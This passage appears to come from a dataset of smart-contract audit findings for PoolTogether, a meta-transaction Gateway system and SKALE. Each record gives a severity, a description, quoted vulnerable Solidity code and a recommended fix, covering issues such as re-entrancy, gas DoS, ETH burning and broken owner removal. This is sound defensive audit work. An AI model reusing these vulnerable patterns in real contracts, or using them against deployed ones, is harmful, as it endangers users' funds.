\"PeriodicPrizeStrategy/external-erc721-not-contract\");\\n require(prizePool.canAwardExternal(\\_externalErc721), \"PeriodicPrizeStrategy/cannot-award-external\");\\n \\n if (!externalErc721s.contains(\\_externalErc721)) {\\n externalErc721s.addAddress(\\_externalErc721);\\n }\\n\\n for (uint256 i = 0; i < \\_tokenIds.length; i++) {\\n uint256 tokenId = \\_tokenIds[i];\\n require(IERC721(\\_externalErc721).ownerOf(tokenId) == address(prizePool), \"PeriodicPrizeStrategy/unavailable-token\");\\n externalErc721TokenIds[\\_externalErc721].push(tokenId);\\n }\\n\\n emit ExternalErc721AwardAdded(\\_externalErc721, \\_tokenIds);\\n}\\n```\\n -PeriodicPrizeStrategy - Token with callback related warnings (ERC777 a.o.)чmediumчThis issue is highly dependent on the configuration of the system. If an admin decides to allow callback enabled token (e.g. `ERC20` compliant `ERC777` or other ERC721/ERC20 extensions) as awards then one recipient may be able to\\nblock the payout for everyone by forcing a revert in the callback when accepting token awards\\nuse the callback to siphon gas, mint gas token, or similar activities\\npotentially re-enter the `PrizeStrategy` contract in an attempt to manipulate the payout (e.g. by immediately withdrawing from the pool to manipulate the 2nd ticket.draw())\\n```\\nfunction \\_awardExternalErc721s(address winner) internal {\\n address currentToken = externalErc721s.start();\\n while (currentToken != address(0) && currentToken != externalErc721s.end()) {\\n uint256 balance = IERC721(currentToken).balanceOf(address(prizePool));\\n if (balance > 0) {\\n prizePool.awardExternalERC721(winner, currentToken, externalErc721TokenIds[currentToken]);\\n delete externalErc721TokenIds[currentToken];\\n }\\n currentToken = externalErc721s.next(currentToken);\\n }\\n externalErc721s.clearAll();\\n}\\n```\\nчIt is highly recommended to not allow tokens with callback functionality into the system. 
Document and/or implement safeguards that disallow the use of callback enabled tokens. Consider implementing means for the “other winners” to withdraw their share of the rewards independently from others.чч```\\nfunction \\_awardExternalErc721s(address winner) internal {\\n address currentToken = externalErc721s.start();\\n while (currentToken != address(0) && currentToken != externalErc721s.end()) {\\n uint256 balance = IERC721(currentToken).balanceOf(address(prizePool));\\n if (balance > 0) {\\n prizePool.awardExternalERC721(winner, currentToken, externalErc721TokenIds[currentToken]);\\n delete externalErc721TokenIds[currentToken];\\n }\\n currentToken = externalErc721s.next(currentToken);\\n }\\n externalErc721s.clearAll();\\n}\\n```\\n -PeriodicPrizeStrategy - unbounded external tokens linked list may be used to force a gas DoSчmediumчThe size of the linked list of ERC20/ERC721 token awards is not limited. This fact may be exploited by an administrative account by adding an excessive number of external token addresses.\\nThe winning user might want to claim their win by calling `completeAward()` which fails in one of the `_distribute() -> _awardAllExternalTokens() -> _awardExternalErc20s/_awardExternalErc721s` while loops if too many token addresses are configured and gas consumption hits the block gas limit (or it just gets too expensive for the user to call).\\nNote: an admin can recover from this situation by removing items from the list.\\n```\\n/// @notice Adds an external ERC20 token type as an additional prize that can be awarded\\n/// @dev Only the Prize-Strategy owner/creator can assign external tokens,\\n/// and they must be approved by the Prize-Pool\\n/// @param \\_externalErc20 The address of an ERC20 token to be awarded\\nfunction addExternalErc20Award(address \\_externalErc20) external onlyOwnerOrListener {\\n \\_addExternalErc20Award(\\_externalErc20);\\n}\\n\\nfunction \\_addExternalErc20Award(address \\_externalErc20) internal {\\n 
require(prizePool.canAwardExternal(\\_externalErc20), \"PeriodicPrizeStrategy/cannot-award-external\");\\n externalErc20s.addAddress(\\_externalErc20);\\n emit ExternalErc20AwardAdded(\\_externalErc20);\\n}\\n```\\n\\n```\\n/// @param newAddress The address to shift to the front of the list\\nfunction addAddress(Mapping storage self, address newAddress) internal {\\n require(newAddress != SENTINEL && newAddress != address(0), \"Invalid address\");\\n require(self.addressMap[newAddress] == address(0), \"Already added\");\\n self.addressMap[newAddress] = self.addressMap[SENTINEL];\\n self.addressMap[SENTINEL] = newAddress;\\n self.count = self.count + 1;\\n}\\n```\\n\\nawarding the tokens loops through the linked list of configured tokens\\n```\\n/// @notice Awards all external ERC721 tokens to the given user.\\n/// The external tokens must be held by the PrizePool contract.\\n/// @dev The list of ERC721s is reset after every award\\n/// @param winner The user to transfer the tokens to\\nfunction \\_awardExternalErc721s(address winner) internal {\\n address currentToken = externalErc721s.start();\\n while (currentToken != address(0) && currentToken != externalErc721s.end()) {\\n uint256 balance = IERC721(currentToken).balanceOf(address(prizePool));\\n if (balance > 0) {\\n prizePool.awardExternalERC721(winner, currentToken, externalErc721TokenIds[currentToken]);\\n delete externalErc721TokenIds[currentToken];\\n }\\n currentToken = externalErc721s.next(currentToken);\\n }\\n externalErc721s.clearAll();\\n}\\n```\\nчLimit the number of tokens an admin can add. 
Consider implementing an interface that allows the user to claim tokens one-by-one or in user-configured batches.чч```\\n/// @notice Adds an external ERC20 token type as an additional prize that can be awarded\\n/// @dev Only the Prize-Strategy owner/creator can assign external tokens,\\n/// and they must be approved by the Prize-Pool\\n/// @param \\_externalErc20 The address of an ERC20 token to be awarded\\nfunction addExternalErc20Award(address \\_externalErc20) external onlyOwnerOrListener {\\n \\_addExternalErc20Award(\\_externalErc20);\\n}\\n\\nfunction \\_addExternalErc20Award(address \\_externalErc20) internal {\\n require(prizePool.canAwardExternal(\\_externalErc20), \"PeriodicPrizeStrategy/cannot-award-external\");\\n externalErc20s.addAddress(\\_externalErc20);\\n emit ExternalErc20AwardAdded(\\_externalErc20);\\n}\\n```\\n -MultipleWinners - setNumberOfWinners does not enforce count>0чmediumчThe constructor of `MultipleWinners` enforces that the argument `_numberOfWinners > 0` while `setNumberOfWinners` does not. A careless or malicious admin might set `__numberOfWinners` to zero to cause the `distribute()` method to throw and not pay out any winners.\\nenforced in the constructor\\n```\\nrequire(\\_numberOfWinners > 0, \"MultipleWinners/num-gt-zero\");\\n```\\n\\nnot enforced when updating the value at a later stage\\n```\\nfunction setNumberOfWinners(uint256 count) external onlyOwner {\\n \\_\\_numberOfWinners = count;\\n\\n emit NumberOfWinnersSet(count);\\n}\\n```\\nчRequire that `numberOfWinners > 0`.чч```\\nrequire(\\_numberOfWinners > 0, \"MultipleWinners/num-gt-zero\");\\n```\\n -LootBox - plunder should disallow plundering to address(0)чmediumчAnyone can call `LootboxController.plunder()` to plunder on behalf of a `tokenId` owner. 
If a `LootBox` received an AirDrop but no `NFT` was issued to an owner (yet) this might open up an opportunity for a malicious actor to call `plunder()` in an attempt to burn the ETH and any airdropped tokens that allow transfers to `address(0)`.\\nNote:\\nDepending on the token implementation, transfers may or may not revert if the `toAddress == address(0)`, while burning the `ETH` will succeed.\\nThis might allow anyone to forcefully burn received `ETH` that would otherwise be available to the future beneficiary\\nIf the airdrop and transfer of `LootBox` ownership are not done within one transaction, this might open up a front-running window that allows a third party to burn air-dropped `ETH` before it can be claimed by the `owner`.\\nconsider one component issues the airdrop in one transaction (or block) and setting the `owner` in a later transaction (or block). The `owner` is unset for a short duration of time which might allow anyone to burn `ETH` held by the `LootBox` proxy instance.\\n`plunder()` receiving the `owner` of an `ERC721.tokenId`\\n```\\nfunction plunder(\\n address erc721,\\n uint256 tokenId,\\n IERC20[] calldata erc20s,\\n LootBox.WithdrawERC721[] calldata erc721s,\\n LootBox.WithdrawERC1155[] calldata erc1155s\\n) external {\\n address payable owner = payable(IERC721(erc721).ownerOf(tokenId));\\n```\\n\\nThe modified `ERC721` returns `address(0)` if the owner is not known\\n```\\n \\* @dev See {IERC721-ownerOf}.\\n \\*/\\nfunction ownerOf(uint256 tokenId) public view override returns (address) {\\n return \\_tokenOwners[tokenId];\\n}\\n```\\n\\nWhile `withdraw[ERC20|ERC721|ERC1155]` fail with `to == address(0)`, `transferEther()` succeeds and burns the eth by sending it to `address(0)`\\n```\\nfunction plunder(\\n IERC20[] memory erc20,\\n WithdrawERC721[] memory erc721,\\n WithdrawERC1155[] memory erc1155,\\n address payable to\\n) external {\\n \\_withdrawERC20(erc20, to);\\n \\_withdrawERC721(erc721, to);\\n \\_withdrawERC1155(erc1155, 
to);\\n transferEther(to, address(this).balance);\\n}\\n```\\nчRequire that the destination address `to` in `plunder()` and `transferEther()` is not `address(0)`.чч```\\nfunction plunder(\\n address erc721,\\n uint256 tokenId,\\n IERC20[] calldata erc20s,\\n LootBox.WithdrawERC721[] calldata erc721s,\\n LootBox.WithdrawERC1155[] calldata erc1155s\\n) external {\\n address payable owner = payable(IERC721(erc721).ownerOf(tokenId));\\n```\\n -PeriodicPrizeStrategy - Inconsistent behavior between award-phase modifiers and view functionsчlowчThe logic in the `canStartAward()` function is inconsistent with that of the `requireCanStartAward` modifier, and the logic in the `canCompleteAward()` function is inconsistent with that of the `requireCanCompleteAward` modifier. Neither of these view functions appear to be used elsewhere in the codebase, but the similarities between the function names and the corresponding modifiers is highly misleading.\\n`canStartAward()` is inconsistent with `requireCanStartAward`\\n```\\nfunction canStartAward() external view returns (bool) {\\n return \\_isPrizePeriodOver() && !isRngRequested();\\n}\\n```\\n\\n```\\nmodifier requireCanStartAward() {\\n require(\\_isPrizePeriodOver(), \"PeriodicPrizeStrategy/prize-period-not-over\");\\n require(!isRngRequested() || isRngTimedOut(), \"PeriodicPrizeStrategy/rng-already-requested\");\\n \\_;\\n}\\n```\\n\\n`canCompleteAward()` is inconsistent with `requireCanCompleteAward`\\n```\\nfunction canCompleteAward() external view returns (bool) {\\n return isRngRequested() && isRngCompleted();\\n}\\n```\\n\\n```\\nmodifier requireCanCompleteAward() {\\n require(\\_isPrizePeriodOver(), \"PeriodicPrizeStrategy/prize-period-not-over\");\\n require(isRngRequested(), \"PeriodicPrizeStrategy/rng-not-requested\");\\n require(isRngCompleted(), \"PeriodicPrizeStrategy/rng-not-complete\");\\n \\_;\\n}\\n```\\nчMake the logic consistent between the view functions and the modifiers of the same name or remove the 
functions.чч```\\nfunction canStartAward() external view returns (bool) {\\n return \\_isPrizePeriodOver() && !isRngRequested();\\n}\\n```\\n -MultipleWinners - Awards can be guaranteed with a set number of ticketsчlowчBecause additional award drawings are distributed at a constant interval in the `SortitionSumTree` by `MultipleWinners._distribute()`, any user that holds a number of tickets `>= floor(totalSupply / __numberOfWinners)` can guarantee at least one award regardless of the initial drawing.\\nMultipleWinners._distribute():\\n```\\nuint256 ticketSplit = totalSupply.div(\\_\\_numberOfWinners);\\nuint256 nextRandom = randomNumber.add(ticketSplit);\\n// the other winners receive their prizeShares\\nfor (uint256 winnerCount = 1; winnerCount < \\_\\_numberOfWinners; winnerCount++) {\\n winners[winnerCount] = ticket.draw(nextRandom);\\n nextRandom = nextRandom.add(ticketSplit);\\n}\\n```\\nчDo not distribute awards at fixed intervals from the initial drawing, but instead randomize the additional drawings as well.чч```\\nuint256 ticketSplit = totalSupply.div(\\_\\_numberOfWinners);\\nuint256 nextRandom = randomNumber.add(ticketSplit);\\n// the other winners receive their prizeShares\\nfor (uint256 winnerCount = 1; winnerCount < \\_\\_numberOfWinners; winnerCount++) {\\n winners[winnerCount] = ticket.draw(nextRandom);\\n nextRandom = nextRandom.add(ticketSplit);\\n}\\n```\\n -MultipleWinners - Inconsistent behavior compared to SingleRandomWinnerчlowчThe `MultipleWinners` strategy carries out award distribution to the zero address if `ticket.draw()` returns `address(0)` (indicating an error condition) while `SingleRandomWinner` does not.\\n`SingleRandomWinner` silently skips award distribution if `ticket.draw()` returns `address(0)`.\\n```\\ncontract SingleRandomWinner is PeriodicPrizeStrategy {\\n function \\_distribute(uint256 randomNumber) internal override {\\n uint256 prize = prizePool.captureAwardBalance();\\n address winner = ticket.draw(randomNumber);\\n if 
(winner != address(0)) {\\n \\_awardTickets(winner, prize);\\n \\_awardAllExternalTokens(winner);\\n }\\n }\\n}\\n```\\n\\n`MultipleWinners` still attempts to distribute awards if `ticket.draw()` returns `address(0)`. This may or may not succeed depending on the implementation of the tokens included in the `externalErc20s` and `externalErc721s` linked lists.\\n```\\nfunction \\_distribute(uint256 randomNumber) internal override {\\n uint256 prize = prizePool.captureAwardBalance();\\n\\n // main winner gets all external tokens\\n address mainWinner = ticket.draw(randomNumber);\\n \\_awardAllExternalTokens(mainWinner);\\n\\n address[] memory winners = new address[](\\_\\_numberOfWinners);\\n winners[0] = mainWinner;\\n```\\nчImplement consistent behavior. Avoid hiding error conditions and consider throwing an exception instead.чч```\\ncontract SingleRandomWinner is PeriodicPrizeStrategy {\\n function \\_distribute(uint256 randomNumber) internal override {\\n uint256 prize = prizePool.captureAwardBalance();\\n address winner = ticket.draw(randomNumber);\\n if (winner != address(0)) {\\n \\_awardTickets(winner, prize);\\n \\_awardAllExternalTokens(winner);\\n }\\n }\\n}\\n```\\n -Initialize implementations for proxy contracts and protect initialization methodsчlowчAny situation where the implementation of proxy contracts can be initialized by third parties should be avoided. This can be the case if the `initialize` function is unprotected or not initialized immediately after deployment. Since the implementation contract is not meant to be used directly without a proxy delegate-calling to it, it is recommended to protect the initialization method of the implementation by initializing on deployment.\\nThis affects all proxy implementations (the delegatecall target contract) deployed in the system.\\nThe implementation for `MultipleWinners` is not initialized. 
Even though not directly used by the system it may be initialized by a third party.\\n```\\nconstructor () public {\\n instance = new MultipleWinners();\\n}\\n```\\n\\nThe deployed `ERC721Contract` is not initialized.\\n```\\nconstructor () public {\\n erc721ControlledInstance = new ERC721Controlled();\\n erc721ControlledBytecode = MinimalProxyLibrary.minimalProxy(address(erc721ControlledInstance));\\n}\\n```\\n\\nThe deployed `LootBox` is not initialized.\\n```\\nconstructor () public {\\n lootBoxActionInstance = new LootBox();\\n lootBoxActionBytecode = MinimalProxyLibrary.minimalProxy(address(lootBoxActionInstance));\\n}\\n```\\nчInitialize unprotected implementation contracts in the implementation's constructor. Protect initialization methods from being called by unauthorized parties or ensure that deployment of the proxy and initialization is performed in the same transaction.чч```\\nconstructor () public {\\n instance = new MultipleWinners();\\n}\\n```\\n -LootBox - transferEther should be internalчlowч`LootBox.transferEther()` can be `internal` as it is only called from `LootBox.plunder()` and the LootBox(proxy) instances are generally very short-living (created and destroyed within one transaction).\\n```\\nfunction transferEther(address payable to, uint256 amount) public {\\n to.transfer(amount);\\n\\n emit TransferredEther(to, amount);\\n}\\n```\\nчRestrict transferEther()'s visibility to `internal`.чч```\\nfunction transferEther(address payable to, uint256 amount) public {\\n to.transfer(amount);\\n\\n emit TransferredEther(to, amount);\\n}\\n```\\n -LootBox - executeCalls can be misused to relay callsчlowч`LootBox` is deployed with `LootBoxController` and serves as the implementation for individual `create2` lootbox proxy contracts. None of the methods of the `LootBox` implementation contract are access restricted. 
A malicious actor may therefore use the `executeCalls()` method to relay arbitrary calls to other contracts on the blockchain in an attempt to disguise the origin or misuse the reputation of the `LootBox` contract (as it belongs to the PoolTogether project).\\nNote: allows non-value and value calls (deposits can be forces via selfdestruct)\\n```\\nfunction executeCalls(Call[] calldata calls) external returns (bytes[] memory) {\\n bytes[] memory response = new bytes[](calls.length);\\n for (uint256 i = 0; i < calls.length; i++) {\\n response[i] = \\_executeCall(calls[i].to, calls[i].value, calls[i].data);\\n }\\n return response;\\n}\\n```\\nчRestrict access to call forwarding functionality to trusted entities. Consider implementing the `Ownable` pattern allowing access to functionality to the owner only.чч```\\nfunction executeCalls(Call[] calldata calls) external returns (bytes[] memory) {\\n bytes[] memory response = new bytes[](calls.length);\\n for (uint256 i = 0; i < calls.length; i++) {\\n response[i] = \\_executeCall(calls[i].to, calls[i].value, calls[i].data);\\n }\\n return response;\\n}\\n```\\n -ERC20 tokens with no return value will fail to transferчhighчAlthough the ERC20 standard suggests that a transfer should return `true` on success, many tokens are non-compliant in this regard.\\nIn that case, the `.transfer()` call here will revert even if the transfer is successful, because solidity will check that the RETURNDATASIZE matches the ERC20 interface.\\n```\\nif (!instance.transfer(getSendAddress(), forwarderBalance)) {\\n revert('Could not gather ERC20');\\n}\\n```\\nчConsider using OpenZeppelin's SafeERC20.чч```\\nif (!instance.transfer(getSendAddress(), forwarderBalance)) {\\n revert('Could not gather ERC20');\\n}\\n```\\n -Delegated transactions can be executed for multiple accountsчhighчThe `Gateway` contract allows users to create meta transactions triggered by the system's backend. 
To do so, one of the owners of the account should sign the message in the following format:\\n```\\naddress sender = \\_hashPrimaryTypedData(\\n \\_hashTypedData(\\n nonce,\\n to,\\n data\\n )\\n).recoverAddress(senderSignature);\\n```\\n\\nThe message includes a nonce, destination address, and call data. The problem is that this message does not include the `account` address. So if the `sender` is the owner of multiple accounts, this meta transaction can be called for multiple accounts.чResolution\\nComment from the client: The issue has been solved\\nAdd the `account` field in the signed message or make sure that any address can be the owner of only one `account`.чч```\\naddress sender = \\_hashPrimaryTypedData(\\n \\_hashTypedData(\\n nonce,\\n to,\\n data\\n )\\n).recoverAddress(senderSignature);\\n```\\n -Removing an owner does not work in PersonalAccountRegistryчhighчAn owner of a personal account can be added/removed by other owners. When removing the owner, only `removedAtBlockNumber` value is updated. 
`accounts[account].owners[owner].added` remains true:\\n```\\naccounts[account].owners[owner].removedAtBlockNumber = block.number;\\n\\nemit AccountOwnerRemoved(\\n account,\\n owner\\n);\\n```\\n\\nBut when the account is checked whether this account is the owner, only `accounts[account].owners[owner].added` is actually checked:\\n```\\nfunction \\_verifySender(\\n address account\\n)\\n private\\n returns (address)\\n{\\n address sender = \\_getContextSender();\\n\\n if (!accounts[account].owners[sender].added) {\\n require(\\n accounts[account].salt == 0\\n );\\n\\n bytes32 salt = keccak256(\\n abi.encodePacked(sender)\\n );\\n\\n require(\\n account == \\_computeAccountAddress(salt)\\n );\\n\\n accounts[account].salt = salt;\\n accounts[account].owners[sender].added = true;\\n\\n emit AccountOwnerAdded(\\n account,\\n sender\\n );\\n }\\n\\n return sender;\\n}\\n```\\n\\nSo the owner will never be removed, because `accounts[account].owners[owner].added` will always be `true.чProperly check if the account is still the owner in the `_verifySender` function.чч```\\naccounts[account].owners[owner].removedAtBlockNumber = block.number;\\n\\nemit AccountOwnerRemoved(\\n account,\\n owner\\n);\\n```\\n -The withdrawal mechanism is overcomplicatedчmediumчTo withdraw the funds, anyone who has the account in `PaymentRegistry` should call the `withdrawDeposit` function and go through the withdrawal process. 
After the lockdown period (30 days), the user will withdraw all the funds from the account.\\n```\\nfunction withdrawDeposit(\\n address token\\n)\\n external\\n{\\n address owner = \\_getContextAccount();\\n uint256 lockedUntil = deposits[owner].withdrawalLockedUntil[token];\\n\\n /\\* solhint-disable not-rely-on-time \\*/\\n\\n if (lockedUntil != 0 && lockedUntil <= now) {\\n deposits[owner].withdrawalLockedUntil[token] = 0;\\n\\n address depositAccount = deposits[owner].account;\\n uint256 depositValue;\\n\\n if (token == address(0)) {\\n depositValue = depositAccount.balance;\\n } else {\\n depositValue = ERC20Token(token).balanceOf(depositAccount);\\n }\\n\\n \\_transferFromDeposit(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n\\n emit DepositWithdrawn(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n } else {\\n \\_deployDepositAccount(owner);\\n\\n lockedUntil = now.add(depositWithdrawalLockPeriod);\\n\\n deposits[owner].withdrawalLockedUntil[token] = lockedUntil;\\n\\n emit DepositWithdrawalRequested(\\n deposits[owner].account,\\n owner,\\n token,\\n lockedUntil\\n );\\n }\\n /\\* solhint-enable not-rely-on-time \\*/\\n}\\n```\\n\\nDuring that period, everyone who has a channel with the user is forced to commit their channels or lose money from that channel. When doing so, every user will reset the initial lockdown period and the withdrawer should start the process again.\\n```\\nif (deposits[sender].withdrawalLockedUntil[token] > 0) {\\n deposits[sender].withdrawalLockedUntil[token] = 0;\\n```\\n\\nThere is no way for the withdrawer to close the channel by himself. If the withdrawer has N channels, it's theoretically possible to wait for up to N*(30 days) period and make N+2 transactions.чThere may be some minor recommendations on how to improve that without major changes:\\nWhen committing a payment channel, do not reset the lockdown period to zero. 
Two better option would be either not change it at all or extend to `now + depositWithdrawalLockPeriod`чч```\\nfunction withdrawDeposit(\\n address token\\n)\\n external\\n{\\n address owner = \\_getContextAccount();\\n uint256 lockedUntil = deposits[owner].withdrawalLockedUntil[token];\\n\\n /\\* solhint-disable not-rely-on-time \\*/\\n\\n if (lockedUntil != 0 && lockedUntil <= now) {\\n deposits[owner].withdrawalLockedUntil[token] = 0;\\n\\n address depositAccount = deposits[owner].account;\\n uint256 depositValue;\\n\\n if (token == address(0)) {\\n depositValue = depositAccount.balance;\\n } else {\\n depositValue = ERC20Token(token).balanceOf(depositAccount);\\n }\\n\\n \\_transferFromDeposit(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n\\n emit DepositWithdrawn(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n } else {\\n \\_deployDepositAccount(owner);\\n\\n lockedUntil = now.add(depositWithdrawalLockPeriod);\\n\\n deposits[owner].withdrawalLockedUntil[token] = lockedUntil;\\n\\n emit DepositWithdrawalRequested(\\n deposits[owner].account,\\n owner,\\n token,\\n lockedUntil\\n );\\n }\\n /\\* solhint-enable not-rely-on-time \\*/\\n}\\n```\\n -The lockdown period shouldn't be extended when called multiple timesчlowчIn order to withdraw a deposit from the `PaymentRegistry`, the account owner should call the `withdrawDeposit` function and wait for `depositWithdrawalLockPeriod` (30 days) before actually transferring all the tokens from the account.\\nThe issue is that if the withdrawer accidentally calls it for the second time before these 30 days pass, the waiting period gets extended for 30 days again.\\n```\\nif (lockedUntil != 0 && lockedUntil <= now) {\\n deposits[owner].withdrawalLockedUntil[token] = 0;\\n\\n address depositAccount = deposits[owner].account;\\n uint256 depositValue;\\n\\n if (token == address(0)) {\\n depositValue = depositAccount.balance;\\n } else {\\n depositValue = 
ERC20Token(token).balanceOf(depositAccount);\\n }\\n\\n \\_transferFromDeposit(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n\\n emit DepositWithdrawn(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n} else {\\n \\_deployDepositAccount(owner);\\n\\n lockedUntil = now.add(depositWithdrawalLockPeriod);\\n```\\nчResolution\\nComment from the client: The issue has been solved\\nOnly extend the waiting period when a withdrawal is requested for the first time.чч```\\nif (lockedUntil != 0 && lockedUntil <= now) {\\n deposits[owner].withdrawalLockedUntil[token] = 0;\\n\\n address depositAccount = deposits[owner].account;\\n uint256 depositValue;\\n\\n if (token == address(0)) {\\n depositValue = depositAccount.balance;\\n } else {\\n depositValue = ERC20Token(token).balanceOf(depositAccount);\\n }\\n\\n \\_transferFromDeposit(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n\\n emit DepositWithdrawn(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n} else {\\n \\_deployDepositAccount(owner);\\n\\n lockedUntil = now.add(depositWithdrawalLockPeriod);\\n```\\n -Gateway can call any contract AcknowledgedчlowчResolution\\nComment from the client: That's right Gateway can call any contract, we want to keep it open for any external contract.\\nThe `Gateway` contract is used as a gateway for meta transactions and batched transactions. 
It can currently call any contract, while is only intended to call specific contracts in the system that implemented `GatewayRecipient` interface:\\n```\\n for (uint256 i = 0; i < data.length; i++) {\\n require(\\n to[i] != address(0)\\n );\\n\\n // solhint-disable-next-line avoid-low-level-calls\\n (succeeded,) = to[i].call(abi.encodePacked(data[i], account, sender));\\n\\n require(\\n succeeded\\n );\\n }\\n}\\n```\\n\\nThere are currently no restrictions for `to` value.чMake sure, only intended contracts can be called by the `Gateway` : `PersonalAccountRegistry`, `PaymentRegistry`, `ENSController`.чч```\\n for (uint256 i = 0; i < data.length; i++) {\\n require(\\n to[i] != address(0)\\n );\\n\\n // solhint-disable-next-line avoid-low-level-calls\\n (succeeded,) = to[i].call(abi.encodePacked(data[i], account, sender));\\n\\n require(\\n succeeded\\n );\\n }\\n}\\n```\\n -Remove unused codeчlowч```\\n return \\_deployAccount(\\n salt,\\n 0\\n );\\n}\\n\\nfunction \\_deployAccount(\\n bytes32 salt,\\n uint256 value\\n)\\n internal\\n returns (address)\\n{\\n return address(new Account{salt: salt, value: value}());\\n}\\n```\\nчIt is recommended to remove this value as there are no use cases for it at the moment, however if it is planned to be used in the future, it should be well documented in the code to prevent confusion.чч```\\n return \\_deployAccount(\\n salt,\\n 0\\n );\\n}\\n\\nfunction \\_deployAccount(\\n bytes32 salt,\\n uint256 value\\n)\\n internal\\n returns (address)\\n{\\n return address(new Account{salt: salt, value: value}());\\n}\\n```\\n -Every node gets a full validator's bountyчhighчResolution\\nThis issue is addressed in Bug/skale 3273 formula fix 435 and SKALE-3273 Fix BountyV2 populating error 438.\\nThe main change is related to how bounties are calculated for each validator. 
Below are a few notes on these pull requests:\\n`nodesByValidator` mapping is no longer used in the codebase and the non-zero values are deleted when `calculateBounty()` is called for a specific validator. The mapping is kept in the code for compatible storage layout in upgradable proxies.\\nSome functions such as `populate()` was developed for the transition to the upgraded contracts (rewrite `_effectiveDelegatedSum` values based on the new calculation formula). This function is not part of this review and will be removed in the future updates.\\nUnlike the old architecture, `nodesByValidator[validatorId]` is no longer used within the system to calculate `_effectiveDelegatedSum` and bounties. This is replaced by using overall staked amount and duration.\\nIf a validator does not claim their bounty during a month, it is considered as a misbehave and her bounty goes to the bounty pool for the next month.\\nTo get the bounty, every node calls the `getBounty` function of the `SkaleManager` contract. This function can be called once per month. The size of the bounty is defined in the `BountyV2` contract in the `_calculateMaximumBountyAmount` function:\\n```\\nreturn epochPoolSize\\n .add(\\_bountyWasPaidInCurrentEpoch)\\n .mul(\\n delegationController.getAndUpdateEffectiveDelegatedToValidator(\\n nodes.getValidatorId(nodeIndex),\\n currentMonth\\n )\\n )\\n .div(effectiveDelegatedSum);\\n```\\n\\nThe problem is that this amount actually represents the amount that should be paid to the validator of that node. But each node will get this amount. 
Additionally, the amount of validator's bounty should also correspond to the number of active nodes, while this formula only uses the amount of delegated funds.чEvery node should get only their parts of the bounty.чч```\\nreturn epochPoolSize\\n .add(\\_bountyWasPaidInCurrentEpoch)\\n .mul(\\n delegationController.getAndUpdateEffectiveDelegatedToValidator(\\n nodes.getValidatorId(nodeIndex),\\n currentMonth\\n )\\n )\\n .div(effectiveDelegatedSum);\\n```\\n -A node exit prevents some other nodes from exiting for some period PendingчmediumчWhen a node wants to exit, the `nodeExit` function should be called as many times, as there are schains in the node. Each time one schain is getting removed from the node. During every call, all the active schains are getting frozen for 12 hours.\\n```\\nfunction freezeSchains(uint nodeIndex) external allow(\"SkaleManager\") {\\n SchainsInternal schainsInternal = SchainsInternal(contractManager.getContract(\"SchainsInternal\"));\\n bytes32[] memory schains = schainsInternal.getActiveSchains(nodeIndex);\\n for (uint i = 0; i < schains.length; i++) {\\n Rotation memory rotation = rotations[schains[i]];\\n if (rotation.nodeIndex == nodeIndex && now < rotation.freezeUntil) {\\n continue;\\n }\\n string memory schainName = schainsInternal.getSchainName(schains[i]);\\n string memory revertMessage = \"Node cannot rotate on Schain \";\\n revertMessage = revertMessage.strConcat(schainName);\\n revertMessage = revertMessage.strConcat(\", occupied by Node \");\\n revertMessage = revertMessage.strConcat(rotation.nodeIndex.uint2str());\\n string memory dkgRevert = \"DKG process did not finish on schain \";\\n ISkaleDKG skaleDKG = ISkaleDKG(contractManager.getContract(\"SkaleDKG\"));\\n require(\\n skaleDKG.isLastDKGSuccessful(keccak256(abi.encodePacked(schainName))),\\n dkgRevert.strConcat(schainName));\\n require(rotation.freezeUntil < now, revertMessage);\\n \\_startRotation(schains[i], nodeIndex);\\n }\\n}\\n```\\n\\nBecause of that, no 
other node that is running one of these schains can exit during that period. In the worst-case scenario, one malicious node has 128 Schains and calls `nodeExit` every 12 hours. That means that some nodes will not be able to exit for 64 days.чMake node exiting process less synchronous.чч```\\nfunction freezeSchains(uint nodeIndex) external allow(\"SkaleManager\") {\\n SchainsInternal schainsInternal = SchainsInternal(contractManager.getContract(\"SchainsInternal\"));\\n bytes32[] memory schains = schainsInternal.getActiveSchains(nodeIndex);\\n for (uint i = 0; i < schains.length; i++) {\\n Rotation memory rotation = rotations[schains[i]];\\n if (rotation.nodeIndex == nodeIndex && now < rotation.freezeUntil) {\\n continue;\\n }\\n string memory schainName = schainsInternal.getSchainName(schains[i]);\\n string memory revertMessage = \"Node cannot rotate on Schain \";\\n revertMessage = revertMessage.strConcat(schainName);\\n revertMessage = revertMessage.strConcat(\", occupied by Node \");\\n revertMessage = revertMessage.strConcat(rotation.nodeIndex.uint2str());\\n string memory dkgRevert = \"DKG process did not finish on schain \";\\n ISkaleDKG skaleDKG = ISkaleDKG(contractManager.getContract(\"SkaleDKG\"));\\n require(\\n skaleDKG.isLastDKGSuccessful(keccak256(abi.encodePacked(schainName))),\\n dkgRevert.strConcat(schainName));\\n require(rotation.freezeUntil < now, revertMessage);\\n \\_startRotation(schains[i], nodeIndex);\\n }\\n}\\n```\\n -Removing a node require multiple transactions and may be very expensive PendingчmediumчWhen removing a node from the network, the owner should redistribute all the schains that are currently on that node to the other nodes. To do so, the validator should call the `nodeExit` function of the `SkaleManager` contract. In this function, only one schain is going to be removed from the node. So the node would have to call the `nodeExit` function as many times as there are schains in the node. 
Every call iterates over every potential node that can be used as a replacement (like in https://github.com/ConsenSys/skale-network-audit-2020-10/issues/3).\\nIn addition to that, the first call will iterate over all schains in the node, make 4 SSTORE operations and external calls for each schain:\\n```\\nfunction \\_startRotation(bytes32 schainIndex, uint nodeIndex) private {\\n ConstantsHolder constants = ConstantsHolder(contractManager.getContract(\"ConstantsHolder\"));\\n rotations[schainIndex].nodeIndex = nodeIndex;\\n rotations[schainIndex].newNodeIndex = nodeIndex;\\n rotations[schainIndex].freezeUntil = now.add(constants.rotationDelay());\\n waitForNewNode[schainIndex] = true;\\n}\\n```\\n\\nThis may hit the block gas limit even easier than issue 5.4.\\nIf the first transaction does not hit the block's gas limit, the maximum price of deleting a node would be BLOCK_GAS_COST * 128. At the moment, it's around $50,000.чOptimize the process of deleting a node, so it can't hit the gas limit in one transaction, and the overall price should be cheaper.чч```\\nfunction \\_startRotation(bytes32 schainIndex, uint nodeIndex) private {\\n 